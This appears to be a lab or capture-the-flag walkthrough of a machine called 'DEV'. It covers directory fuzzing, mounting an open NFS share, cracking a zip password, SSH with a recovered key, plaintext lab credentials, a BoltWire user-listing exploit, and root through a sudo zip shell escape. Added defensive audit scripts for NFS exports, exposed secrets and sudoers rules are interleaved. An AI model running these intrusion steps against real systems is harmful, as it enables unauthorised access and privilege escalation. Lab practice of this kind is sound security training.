DEV

Normal scans first

Found an Apache server which serves a Bolt installation on the IP:

http://192.168.218.132/

and PHP is running on port 8080, so we can check:

http://192.168.218.132:8080/

Not much info there; we can run dirbuster or ffuf to look for subdirectories:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.218.132/FUZZ

To check which NFS exports the server offers we can run:

showmount -e 192.168.218.132

which gives us back the /srv/nfs export we saw earlier in nmap.

We can make a mount folder for dev:

sudo mkdir /mnt/dev

and then mount the export there:

sudo mount -t nfs 192.168.218.132:/srv/nfs /mnt/dev

then go to the folder and list it:

cd /mnt/dev
ls
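Defender's side of the NFS part (added example, not part of the original walkthrough): the share could be mounted from any host, which is why showmount and mount worked without any authentication. This POSIX shell check reads an exports(5) file and flags entries with no client restriction (a `*` client or no client list at all) or with no_root_squash. The /etc/exports it scans is a constructed sample written to a temp file; `audit_exports` is the assumed function name.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit an exports(5) file for
# NFS shares that any client can mount (no host restriction) or that skip
# root squashing. Usage: audit_exports /etc/exports
audit_exports() {
    awk '
        /^[ \t]*(#|$)/ { next }                       # comments and blank lines
        {
            path = $1
            if (NF < 2) {                             # "/srv/x" alone: world-exported
                print path ": no client list (any host may mount)"
                next
            }
            for (i = 2; i <= NF; i++) {
                spec = $i
                client = spec; sub(/\(.*/, "", client)            # host part
                opts = ""
                if (match(spec, /\(.*\)/))
                    opts = substr(spec, RSTART + 1, RLENGTH - 2)  # text inside ( )
                if (client == "*" || client == "")
                    print path ": exported to any host (" spec ")"
                if (opts ~ /no_root_squash/)
                    print path ": no_root_squash for " client
            }
        }' "$1"
}

# Constructed sample exports file; the /srv/nfs line is the kind of entry
# that lets showmount/mount succeed from an arbitrary client.
sample_exports=$(mktemp)
cat > "$sample_exports" <<'EOF'
# constructed /etc/exports for the demo
/srv/nfs      *(rw,sync,no_subtree_check)
/srv/backup   10.0.0.0/24(ro,sync,root_squash)
/srv/share    192.168.1.5(rw,no_root_squash)
EOF

audit_exports "$sample_exports"
```

Run it against the real /etc/exports on an NFS server; anything it prints should either get a host or subnet restriction or be removed. The constructed sample yields two findings (the world-exported /srv/nfs and the no_root_squash on /srv/share) and nothing for the properly restricted /srv/backup.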

The zip file we downloaded is password protected. We can crack it using fcrackzip:

Install:

sudo apt install fcrackzip

Use:

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip

-v: verbose

-u: unzip (try to actually extract to verify the password)

-D: dictionary attack

-p /usr/share/wordlists/rockyou.txt: which wordlist/dictionary to use

last argument is the zip name

found password: java101

Unzipping with the cracked password:

sudo unzip save.zip
#when prompted for password:
java101

See what's inside:

ls
cat todo.txt

We can use the id_rsa file (private key) to SSH into the server:

ssh -i id_rsa jp@192.168.218.132

jp isn't a valid user; we need to find out the actual username!

The scan on 8080 did bring back BoltWire.

The scan also brought back an /app/ directory, which gave us config.yml containing:

username: bolt
password: I_love_java
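Defender's side of the config.yml finding (added example, not part of the original walkthrough): a plaintext credential file sitting under the web root is fetchable by anyone who guesses the path. This shell check walks a document root, looks only at config-style file names and reports those carrying credential-looking keys such as `password:`. The document root it scans is a constructed temp directory, and `find_exposed_secrets` is the assumed function name.

```shell
#!/bin/sh
# Added example, not from the original writeup: list files under a web
# document root that a browser could fetch and that carry credential-looking
# keys. Usage: find_exposed_secrets /var/www/html
find_exposed_secrets() {
    find "$1" -type f \
        \( -name '*.yml' -o -name '*.yaml' -o -name '*.ini' -o -name '*.env' -o -name '*.conf' \) \
        -exec grep -l -i -E '^[[:space:]]*(password|passwd|secret|api_key|token)[[:space:]]*[:=]' {} + \
        | sort
}

# Constructed sample document root for the demo.
docroot=$(mktemp -d)
mkdir -p "$docroot/app" "$docroot/files"
cat > "$docroot/app/config.yml" <<'EOF'
# constructed config, mirrors the shape of the exposed /app/config.yml
username: bolt
password: EXAMPLE_PLACEHOLDER_NOT_A_REAL_SECRET
EOF
printf '<?php echo "hello"; ?>\n' > "$docroot/index.php"
printf '[database]\nhost = localhost\n' > "$docroot/files/db.ini"

find_exposed_secrets "$docroot"
```

Only app/config.yml is reported for the sample; index.php and the credential-free db.ini are not. Anything the check prints on a real server should be moved outside the document root or blocked in the vhost configuration, and the credential it held rotated, since the walkthrough shows the same password was reused for the application login.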

After checking the BoltWire version, we were able to reach the list of users using the exploit, which gave us:

jeanpaul

We can run the SSH command again with that username, checking for password reuse:

After gaining access, we run:

history
sudo -l

and we see we are allowed to run zip with sudo.

How do we privesc from zip (or anything that isn’t a user)?

https://gtfobins.github.io/gtfobins/zip/

this website!
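Defender's side of the sudo finding (added example, not part of the original walkthrough): the privesc works because a sudoers rule hands a non-root user a binary that the GTFOBins page documents as escaping to a shell. This shell check reads a sudoers file and flags rules for non-root principals that grant a binary from a watch list; the list holds only `zip`, the binary this box granted, and the second argument lets you pass your own comma-separated list. The sudoers fragment it scans is constructed, and `audit_sudoers` is the assumed function name.

```shell
#!/bin/sh
# Added example, not from the original writeup: flag sudoers rules that let a
# non-root user run a binary from a watch list (default: zip, the binary this
# box granted). Usage: audit_sudoers /etc/sudoers [comma-separated watch list]
audit_sudoers() {
    awk -v watch="${2:-zip}" '
        BEGIN { n = split(watch, w, ",") }
        /^[ \t]*(#|$)/ || /^Defaults/ { next }         # comments, blanks, Defaults
        $1 == "root" { next }                           # root rules are expected
        {
            cmds = $0
            sub(/^[^=]*=[ \t]*/, "", cmds)              # strip "user HOST="
            sub(/^\([^)]*\)[ \t]*/, "", cmds)           # strip "(runas)" if present
            nopw = (cmds ~ /NOPASSWD:/) ? " without a password" : ""
            for (i = 1; i <= n; i++)
                if (cmds ~ ("(^|/|[ \t,:])" w[i] "([ \t,]|$)"))
                    print $1 ": may run " w[i] " via sudo" nopw " (" cmds ")"
        }' "$1"
}

# Constructed sudoers fragment for the demo.
sample_sudoers=$(mktemp)
cat > "$sample_sudoers" <<'EOF'
# constructed /etc/sudoers fragment
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%admin          ALL=(ALL) ALL
jeanpaul        ALL=(ALL) NOPASSWD: /usr/bin/zip
deploy          ALL=(www-data) /usr/bin/systemctl restart apache2
EOF

audit_sudoers "$sample_sudoers"
```

For the sample only the jeanpaul rule is reported; the root and %admin rules are expected, and the deploy rule grants nothing on the list. A flagged rule should be removed, or replaced by a wrapper script that performs the one archiving task the user actually needs, since `sudo -l` showing such a binary is exactly what the walkthrough uses as its foothold for root.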